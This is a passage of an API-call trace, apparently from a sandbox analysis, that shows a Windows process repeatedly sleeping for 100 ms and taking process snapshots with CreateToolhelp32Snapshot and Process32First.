Sleep (dwMilliseconds=0x64) [0284.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.417] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.485] Sleep (dwMilliseconds=0x64) [0284.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.521] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.635] Sleep (dwMilliseconds=0x64) [0284.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.651] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.711] Sleep (dwMilliseconds=0x64) [0284.714] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.726] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.783] Sleep (dwMilliseconds=0x64) [0284.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.796] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.867] Sleep (dwMilliseconds=0x64) [0284.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.889] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.960] Sleep (dwMilliseconds=0x64) [0284.963] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.979] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.047] Sleep (dwMilliseconds=0x64) [0285.050] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0285.063] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.173] Sleep (dwMilliseconds=0x64) [0285.178] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0285.191] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.260] Sleep (dwMilliseconds=0x64) [0285.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0285.278] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.370] Sleep (dwMilliseconds=0x64) [0285.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0285.394] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.524] Sleep (dwMilliseconds=0x64) [0285.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0285.545] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.670] Sleep (dwMilliseconds=0x64) [0285.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0285.691] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.756] Sleep (dwMilliseconds=0x64) [0285.759] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0285.771] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.829] Sleep (dwMilliseconds=0x64) [0285.831] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0285.848] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.930] Sleep (dwMilliseconds=0x64) [0285.933] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0285.954] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.026] Sleep (dwMilliseconds=0x64) [0286.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0286.042] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.109] Sleep (dwMilliseconds=0x64) [0286.113] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0286.126] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.192] Sleep (dwMilliseconds=0x64) [0286.196] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0286.209] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.280] Sleep (dwMilliseconds=0x64) [0286.283] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0286.481] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.665] Sleep (dwMilliseconds=0x64) [0286.678] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0286.691] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.753] Sleep (dwMilliseconds=0x64) [0286.759] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0286.771] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.837] Sleep (dwMilliseconds=0x64) [0286.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0286.849] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.917] Sleep (dwMilliseconds=0x64) [0286.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0286.928] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.979] Sleep (dwMilliseconds=0x64) [0286.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.001] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.074] Sleep (dwMilliseconds=0x64) [0287.076] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.092] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.152] Sleep (dwMilliseconds=0x64) [0287.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.165] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.231] Sleep (dwMilliseconds=0x64) [0287.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.247] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.323] Sleep (dwMilliseconds=0x64) [0287.326] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.345] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.412] Sleep (dwMilliseconds=0x64) [0287.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.446] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.522] Sleep (dwMilliseconds=0x64) [0287.530] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.548] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.746] Sleep (dwMilliseconds=0x64) [0287.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.795] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.908] Sleep (dwMilliseconds=0x64) [0287.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.927] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.984] Sleep (dwMilliseconds=0x64) [0287.988] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0287.997] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.047] Sleep (dwMilliseconds=0x64) [0288.050] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.062] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.111] Sleep (dwMilliseconds=0x64) [0288.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.125] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.176] Sleep (dwMilliseconds=0x64) [0288.179] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.188] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.239] Sleep (dwMilliseconds=0x64) [0288.242] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.255] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.317] Sleep (dwMilliseconds=0x64) [0288.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.333] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.386] Sleep (dwMilliseconds=0x64) [0288.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.398] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.458] Sleep (dwMilliseconds=0x64) [0288.460] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.472] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.522] Sleep (dwMilliseconds=0x64) [0288.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.545] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.689] Sleep (dwMilliseconds=0x64) [0288.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.706] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.777] Sleep (dwMilliseconds=0x64) [0288.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.795] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.846] Sleep (dwMilliseconds=0x64) [0288.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.859] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.918] Sleep (dwMilliseconds=0x64) [0288.920] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.930] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.982] Sleep (dwMilliseconds=0x64) [0288.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0288.996] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.055] Sleep (dwMilliseconds=0x64) [0289.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.069] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.132] Sleep (dwMilliseconds=0x64) [0289.136] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.151] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.207] Sleep (dwMilliseconds=0x64) [0289.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.227] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.278] Sleep (dwMilliseconds=0x64) [0289.280] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.290] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.348] Sleep (dwMilliseconds=0x64) [0289.351] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.366] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.416] Sleep (dwMilliseconds=0x64) [0289.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.429] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.483] Sleep (dwMilliseconds=0x64) [0289.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.496] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.548] Sleep (dwMilliseconds=0x64) [0289.573] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.591] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.677] Sleep (dwMilliseconds=0x64) [0289.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.697] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.767] Sleep (dwMilliseconds=0x64) [0289.772] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.790] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.850] Sleep (dwMilliseconds=0x64) [0289.852] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.865] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.923] Sleep (dwMilliseconds=0x64) [0289.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0289.937] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.032] Sleep (dwMilliseconds=0x64) [0290.035] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.048] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 